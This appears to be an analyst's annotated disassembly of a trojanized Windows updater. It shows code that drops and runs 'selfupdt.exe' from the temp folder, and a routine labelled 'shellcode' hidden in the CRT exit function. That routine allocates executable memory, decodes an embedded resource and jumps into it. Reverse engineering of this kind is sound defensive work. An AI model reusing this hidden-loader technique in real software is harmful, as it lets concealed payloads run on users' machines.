LAB_004035cf: ;XREF[1,0]: 004035c6
.text:004035cf 68b8dc5100 PUSH .rdata:u_Failed_to_set_SelfUpdtPath_r...;= u"Failed to set SelfUpdtPath regis...
LAB_004035d4: ;XREF[2,0]: 0040352d,004035cd
.text:004035d4 e8a7e0ffff CALL printf_wrapper2 ;undefined printf_wrapper2(wchar_t * ...
.text:004035d9 83c404 ADD ESP,0x4
.text:004035dc 8d8d88ebffff LEA ECX=>local_147c,[0xffffeb88 + EBP]
.text:004035e2 e859eeffff CALL FUN_00402440 ;undefined FUN_00402440(int * param_1)
.text:004035e7 8d8d84ebffff LEA ECX=>local_1480,[0xffffeb84 + EBP]
.text:004035ed c745fcfff... MOV dword ptr [EBP + local_8+0x4],0xffffffff
.text:004035f4 e847eeffff CALL FUN_00402440 ;undefined FUN_00402440(int * param_1)
LAB_004035f9: ;XREF[4,0]: 00403361,0040336e,00403391,004034db
.text:004035f9 8b8598ebffff MOV EAX,dword ptr [local_146c+0x4 + EBP]
.text:004035ff 50 PUSH EAX ;HKEY hKey for RegCloseKey
.text:00403600 ff1568c05100 CALL dword ptr [->ADVAPI32.DLL::RegCloseKey]
.text:00403606 85db TEST EBX,EBX
.text:00403608 0f8408010000 JZ LAB_00403716
.text:0040360e 687cdc5100 PUSH .rdata:u_blSelfUpdateRequest_=_true_0...;= u"blSelfUpdateRequest = true\n"
.text:00403613 e868e0ffff CALL printf_wrapper2 ;undefined printf_wrapper2(wchar_t * ...
.text:00403618 83c404 ADD ESP,0x4
.text:0040361b ff1538c45100 CALL dword ptr [->KERNEL32.DLL::GetCurrent...
.text:00403621 83bd8cebf... CMP dword ptr [local_1478+0x4 + EBP],0x1
.text:00403628 a3004f5600 MOV [.data:DAT_00564f00],EAX
.text:0040362d 7517 JNZ LAB_00403646
.text:0040362f 6838dc5100 PUSH .rdata:u_Current_version_less_than_3....;= u"Current version less than 3.3.4\n"
.text:00403634 e847e0ffff CALL printf_wrapper2 ;undefined printf_wrapper2(wchar_t * ...
.text:00403639 68f0db5100 PUSH .rdata:u_LiveUpdate.exe_ALU.exe_LiveU...;= u"LiveUpdate.exe ALU.exe LiveUpdt....
.text:0040363e e8fd0b0000 CALL FUN_00404240 ;undefined FUN_00404240(wchar_t * par...
.text:00403643 83c408 ADD ESP,0x8
LAB_00403646: ;XREF[1,0]: 0040362d
.text:00403646 33c9 XOR ECX,ECX
.text:00403648 6806020000 PUSH 0x206
.text:0040364d 51 PUSH ECX
.text:0040364e 8d95a2fbffff LEA EDX=>local_462,[0xfffffba2 + EBP]
.text:00403654 52 PUSH EDX
.text:00403655 66898da0f... MOV word ptr [local_464+0x4 + EBP],CX
.text:0040365c e8ef460f00 CALL FUN_004f7d50 ;int * FUN_004f7d50(int * param_1, by...
.text:00403661 33c0 XOR EAX,EAX
.text:00403663 6806020000 PUSH 0x206
.text:00403668 50 PUSH EAX
.text:00403669 8d8daafdffff LEA ECX=>local_25a,[0xfffffdaa + EBP]
.text:0040366f 51 PUSH ECX
.text:00403670 668985a8f... MOV word ptr [file_name+0x4 + EBP],AX
.text:00403677 e8d4460f00 CALL FUN_004f7d50 ;int * FUN_004f7d50(int * param_1, by...
.text:0040367c 83c418 ADD ESP,0x18
.text:0040367f 8d95a0fbffff LEA EDX=>local_464,[0xfffffba0 + EBP]
.text:00403685 52 PUSH EDX ;LPWSTR lpBuffer for GetTempPathW
.text:00403686 6804010000 PUSH 0x104 ;DWORD nBufferLength for GetTempPathW
.text:0040368b ffd7 CALL EDI=>KERNEL32.DLL::GetTempPathW
.text:0040368d 8d85a0fbffff LEA EAX=>local_464,[0xfffffba0 + EBP]
.text:00403693 50 PUSH EAX
.text:00403694 8d8da8fdffff LEA ECX=>file_name,[0xfffffda8 + EBP]
.text:0040369a 6870de5100 PUSH .rdata:u_%sselfupdt.exe_0051de70 ;= u"%sselfupdt.exe"
.text:0040369f 51 PUSH ECX
.text:004036a0 ba04010000 MOV EDX,0x104
.text:004036a5 e886dbffff CALL printf_wrapper ;void printf_wrapper(undefined4 param...
.text:004036aa 8d95a8fdffff LEA EDX=>file_name,[0xfffffda8 + EBP]
.text:004036b0 52 PUSH EDX
.text:004036b1 68ccdb5100 PUSH .rdata:u_Path_to_save:_%s_0051dbcc ;= u"Path to save: %s\n"
.text:004036b6 e8c5dfffff CALL printf_wrapper2 ;undefined printf_wrapper2(wchar_t * ...
.text:004036bb 68c4db5100 PUSH .rdata:DAT_0051dbc4 ;= 45h E
.text:004036c0 6888000000 PUSH 0x88
.text:004036c5 8d85a8fdffff LEA EAX=>file_name,[0xfffffda8 + EBP]
.text:004036cb 50 PUSH EAX
.text:004036cc 6a00 PUSH 0x0
.text:004036ce e83de1ffff CALL write_something ;=
;DWORD write_something(HMODULE rsrc_m...
.text:004036d3 83c424 ADD ESP,0x24
.text:004036d6 85c0 TEST EAX,EAX
.text:004036d8 743c JZ LAB_00403716
.text:004036da 68a0db5100 PUSH .rdata:u_ExtractFile_OK!_0051dba0 ;= u"ExtractFile OK!\n"
.text:004036df e89cdfffff CALL printf_wrapper2 ;undefined printf_wrapper2(wchar_t * ...
.text:004036e4 83c404 ADD ESP,0x4
.text:004036e7 6a00 PUSH 0x0 ;INT nShowCmd for ShellExecuteW
.text:004036e9 8d8da0fbffff LEA ECX=>local_464,[0xfffffba0 + EBP]
.text:004036ef 51 PUSH ECX ;LPCWSTR lpDirectory for ShellExecuteW
.text:004036f0 6a00 PUSH 0x0 ;LPCWSTR lpParameters for ShellExecuteW
.text:004036f2 6884db5100 PUSH .rdata:u_selfupdt.exe_0051db84 ;LPCWSTR lpFile for ShellExecuteW
.text:004036f7 6834cd5100 PUSH .rdata:u_open_0051cd34 ;LPCWSTR lpOperation for ShellExecuteW
.text:004036fc 6a00 PUSH 0x0 ;HWND hwnd for ShellExecuteW
.text:004036fe ff1500c55100 CALL dword ptr [->SHELL32.DLL::ShellExecuteW]
.text:00403704 83f820 CMP EAX,0x20
.text:00403707 7e0d JLE LAB_00403716
.text:00403709 6860db5100 PUSH .rdata:u_ShellExecute_OK!_0051db60 ;= u"ShellExecute OK!\n"
.text:0040370e e86ddfffff CALL printf_wrapper2 ;undefined printf_wrapper2(wchar_t * ...
.text:00403713 83c404 ADD ESP,0x4
LAB_00403716: ;XREF[4,0]: 004032f6,00403608,004036d8,00403707
.text:00403716 8bc3 MOV EAX,EBX
.text:00403718 8b4df4 MOV ECX,dword ptr [EBP + local_10+0x4]
.text:0040371b 64890d000... MOV dword ptr FS:[0x0],ECX
.text:00403722 59 POP ECX
.text:00403723 5f POP EDI
.text:00403724 5e POP ESI
.text:00403725 5b POP EBX
.text:00403726 8b4df0 MOV ECX,dword ptr [EBP + local_14+0x4]
.text:00403729 33cd XOR ECX,EBP
.text:0040372b e80e460f00 CALL FUN_004f7d3e ;undefined FUN_004f7d3e(undefined1 pa...
.text:00403730 8be5 MOV ESP,EBP
.text:00403732 5d POP EBP
.text:00403733 c3 RET
;********************************************************************************************************
;* Library Function - Single Match *
;* Name: ___crtExitProcess *
;* Library: Visual Studio 2010 Release *
;********************************************************************************************************
;void ___crtExitProcess(int param_1)
;param_1 int 4 ;XREF[2,0]: 004f973b,004f9744
;XREF[4,0]: 004f788b,004f9597,004f9974,00503cd7
.text:004f9736 8bff MOV EDI,EDI
.text:004f9738 55 PUSH EBP
.text:004f9739 8bec MOV EBP,ESP
.text:004f973b ff7508 PUSH dword ptr [EBP + param_1+0x4]
.text:004f973e e8c5210200 CALL shellcode ;undefined shellcode(void)
.text:004f9743 59 POP ECX
.text:004f9744 ff7508 PUSH dword ptr [EBP + param_1+0x4] ;UINT uExitCode for ExitProcess
.text:004f9747 ff1594c25100 CALL dword ptr [->KERNEL32.DLL::ExitProcess]
.text:004f974d cc INT 3
;********************************************************************************************************
;* FUNCTION *
;********************************************************************************************************
;undefined shellcode(void)
;module_add... void * EAX ;XREF[1,0]: 0051b910
;buffer uint * EAX ;XREF[1,0]: 0051b938
;real_size int ECX ;XREF[1,0]: 0051b99d
;Rsrc undefined * ESI ;XREF[1,0]: 0051b9a0
;local_8 undefined4 -8 ;XREF[4,0]: 0051b91e,0051b945,0051b98b,0051b9c3
;local_c undefined4 -c ;XREF[2,0]: 0051b92a,0051b97f
;local_10 undefined4 -10 ;XREF[3,0]: 0051b942,0051b959,0051b965
;local_14 undefined4 -14 ;XREF[3,0]: 0051b96f,0051b996,0051b9a4
;local_18 undefined4 -18 ;XREF[3,0]: 0051b988,0051b9aa,0051b9b5
;VirtualAlloc VirtualAlloc * HASH...
;size uint HASH...
;XREF[1,0]: 004f973e
.text:0051b908 55 PUSH EBP
.text:0051b909 8bec MOV EBP,ESP
.text:0051b90b 83ec14 SUB ESP,0x14
.text:0051b90e 6a00 PUSH 0x0 ;LPCWSTR lpModuleName for GetModuleHa...
.text:0051b910 ff1504c45100 CALL dword ptr [->KERNEL32.DLL::GetModuleH...
.text:0051b916 85c0 TEST module_addr_0x40...,module_addr_0x400000
.text:0051b918 0f84a2000000 JZ LAB_0051b9c0
.text:0051b91e 8945fc MOV dword ptr [EBP +...,module_addr_0x400000
.text:0051b921 ba7cc21100 MOV EDX,0x11c27c
.text:0051b926 03d0 ADD EDX,module_addr_0x400000
.text:0051b928 8b3a MOV EDI,dword ptr [EDX]
.text:0051b92a 897df8 MOV dword ptr [EBP + local_c+0x4],EDI
.text:0051b92d 6a40 PUSH PAGE_EXECUTE_READWRITE
.text:0051b92f 6800100000 PUSH MEM_COMMIT
.text:0051b934 6a20 PUSH 0x20
.text:0051b936 6a00 PUSH 0x0
.text:0051b938 ffd7 CALL EDI
.text:0051b93a 85c0 TEST buffer,buffer
.text:0051b93c 0f847e000000 JZ LAB_0051b9c0
.text:0051b942 8945f4 MOV dword ptr [EBP + local_10+0x4],buffer
.text:0051b945 8b75fc MOV ESI,dword ptr [EBP + local_8+0x4]
.text:0051b948 81c678ec1600 ADD ESI,0x16ec78
.text:0051b94e 8bf8 MOV EDI,buffer
;copy 32bytes of Rsrc to buffer
.text:0051b950 b910000000 MOV ECX,0x10
LAB_0051b955: ;XREF[1,0]: 0051b957
.text:0051b955 ac LODSB ESI
.text:0051b956 aa STOSB ES:EDI
.text:0051b957 e2fc LOOP LAB_0051b955
.text:0051b959 8b55f4 MOV EDX,dword ptr [EBP + local_10+0x4]
.text:0051b95c 52 PUSH EDX
.text:0051b95d 6a10 PUSH 0x10
.text:0051b95f 52 PUSH EDX
.text:0051b960 e89dfeffff CALL decode ;undefined decode(uint * buffer, int ...
.text:0051b965 8b55f4 MOV EDX,dword ptr [EBP + local_10+0x4]
.text:0051b968 8b4208 MOV buffer,dword ptr [EDX + 0x8]
.text:0051b96b 85c0 TEST buffer,buffer
.text:0051b96d 7451 JZ LAB_0051b9c0
.text:0051b96f 8945f0 MOV dword ptr [EBP + local_14+0x4],buffer
.text:0051b972 83c010 ADD buffer,0x10
.text:0051b975 6a40 PUSH 0x40
.text:0051b977 6800100000 PUSH 0x1000
.text:0051b97c 50 PUSH buffer
.text:0051b97d 6a00 PUSH 0x0
.text:0051b97f 8b55f8 MOV EDX,dword ptr [EBP + local_c+0x4]
.text:0051b982 ffd2 CALL EDX
.text:0051b984 85c0 TEST buffer,buffer
.text:0051b986 7438 JZ LAB_0051b9c0
.text:0051b988 8945ec MOV dword ptr [EBP + local_18+0x4],buffer
.text:0051b98b 8b75fc MOV ESI,dword ptr [EBP + local_8+0x4]
.text:0051b98e 81c678ec1600 ADD ESI,0x16ec78
.text:0051b994 8bf8 MOV EDI,buffer
.text:0051b996 8b4df0 MOV ECX,dword ptr [EBP + local_14+0x4]
.text:0051b999 85c9 TEST ECX,ECX
.text:0051b99b 7423 JZ LAB_0051b9c0
.text:0051b99d 83c110 ADD real_size,0x10
LAB_0051b9a0: ;XREF[1,0]: 0051b9a2
.text:0051b9a0 ac LODSB Rsrc
.text:0051b9a1 aa STOSB ES:EDI
.text:0051b9a2 e2fc LOOP LAB_0051b9a0
.text:0051b9a4 8b5df0 MOV EBX,dword ptr [EBP + local_14+0x4]
.text:0051b9a7 83c310 ADD EBX,0x10
.text:0051b9aa 8b55ec MOV EDX,dword ptr [EBP + local_18+0x4]
.text:0051b9ad 52 PUSH EDX
.text:0051b9ae 53 PUSH EBX
.text:0051b9af 52 PUSH EDX
.text:0051b9b0 e84dfeffff CALL decode ;undefined decode(uint * buffer, int ...
.text:0051b9b5 8b55ec MOV EDX,dword ptr [EBP + local_18+0x4]
.text:0051b9b8 81c2ab0f0000 ADD EDX,0xfab
.text:0051b9be ffd2 CALL EDX
LAB_0051b9c0: ;XREF[5,0]: 0051b918,0051b93c,0051b96d,0051b986
; 0051b99b
.text:0051b9c0 33c0 XOR buffer,buffer
.text:0051b9c2 50 PUSH buffer
.text:0051b9c3 8b55fc MOV EDX,dword ptr [EBP + local_8+0x4]
.text:0051b9c6 81c294c21100 ADD EDX,0x11c294
.text:0051b9cc 8b1a MOV EBX,dword ptr [EDX]
.text:0051b9ce ffd3 CALL EBX
.text:0051b9d0 83c414 ADD ESP,0x14
.text:0051b9d3 8be5 MOV ESP,EBP
.text:0051b9d5 c3 RET